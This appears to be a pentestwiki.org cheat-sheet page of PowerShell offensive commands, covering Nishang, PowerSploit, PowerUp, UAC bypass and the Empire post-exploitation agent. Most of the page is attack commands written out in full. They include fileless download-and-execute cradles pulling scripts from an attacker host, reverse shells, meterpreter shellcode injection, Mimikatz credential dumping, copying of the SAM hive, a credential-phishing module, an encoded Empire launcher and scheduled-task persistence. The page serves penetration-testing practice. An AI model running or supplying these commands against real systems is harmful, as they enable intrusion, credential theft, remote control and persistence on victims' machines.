PowerShell frameworks

From pentestwiki.org

Intro

To check the version:

PS>$PSVersionTable.PSVersion


Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista
Powershell v2.0: Win 7, Server 2008 R2
Powershell v3.0: Win 8, Server 2012
Powershell v4.0: Win 8.1, Server 2012 R2
Powershell v5.0: Win 10

Change default colors:

PS>$host.ui.RawUI.ForegroundColor = "black"
PS>$host.ui.RawUI.BackgroundColor = "white"
PS>clear



To compile a ps1 into .exe use PowerGUI Pro script editor


  • List hotfixes
PS>Get-HotFix

Equivalent using wmic:

PS>wmic qfe list


  • Detect sandboxed environment
PS>Get-wmiobject win32_bios | format-list Name,SerialNumber


  • Handling Certificates

To see installed user certificates

PS>Get-ChildItem -Path "Cert:\CurrentUser\My"
PS>Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:

C:>certmgr.msc


To create a self-signed certificate:

PS>$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org


  • Show system uptime
PS>Get-CimInstance -ClassName win32_operatingsystem
PS> select csname, lastbootuptime


Scripts

Capturing a screenshot

Param(
[Parameter(Mandatory = $true)][string]$Path
)
$FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp"
$File = "$Path\$FileName"
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$bitmap.Save($File) 
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.


in kali: /usr/share/nishang

C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }"


C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}"


C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}"


C:>powershell.exe –exec bypass –Command "& {Import-Module ‘C:\Users\User\Desktop\temp\Get-PassHashes.ps1’; Get-PassHashes}"


  • Fileless execution
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/Check-VM.ps1’); Check-VM"


  • Dont work in Windows 7
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/winpost/Invoke-PowerShellTcp.ps1’); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"


  • In Windows 7:
C:>powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', ‘Invoke-PowerShellTcp.ps1’); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443"


Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit

C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"


PS>IEX (New-Object Net.WebClient).DownloadString(“http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1”);\ Invoke-ReverseDnsLookup -IpRange $IP/24


PS>IEX (New-Object Net.WebClient).DownloadString(“http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1”);\ Invoke-Mimikatz -DumpCreds


PS>IEX (New-Object Net.WebClient).DownloadString(“http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1”);\ Invoke-NinjaCopy -Path “C:\Windows\System32\config\SAM” -LocalDestination “C:\Users\master\Desktop\SAM”


PowerUP

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

C:>powershell.exe -nop -exec bypass


PS>Import-Module .\PowerUp.ps1


PS>Invoke-AllChecks | Out-File -Encoding ASCII checks.txt


BypassUAC

PS>import-module .\bypass-uac.ps1


Does not work for Windows Server 2012:

PS>Bypass-UAC -Method UacMethodSysprep


Work for Windows Server 2012:

PS>Bypass-UAC -Method ucmDismMethod
PS>Bypass-UAC -Method UacMethodMMC2


More info:


Trojanize DLL

See also Msfvenom payloads

Trojanize Windows Service

PS>Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]


Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/

Empire

Empire is a PowerShell and Python post-exploitation agent

Installation:

root #cd Empire/
root #./setup/install.sh


Usage:

root #./empire
(Empire) > listeners

(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

(Empire: listeners/http) >


Copy the generated powershell payload in the Windows target to open a session in Empire:

C:>powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==


To handle agents in Empire:

$agents
$interact $AGENTID
$rename [old name] [new name]


Advanced modules:

$bypassuac http
$set Listener http
$run

or disk-less

$usemodule privesc/bypassuac_wscript


Credentials gathering:

$mimikatz


Persistence:

$usemodule persistence/elevated/schtasks


References:

WinEnum

A Powershell Privilege Escalation Enumeration Script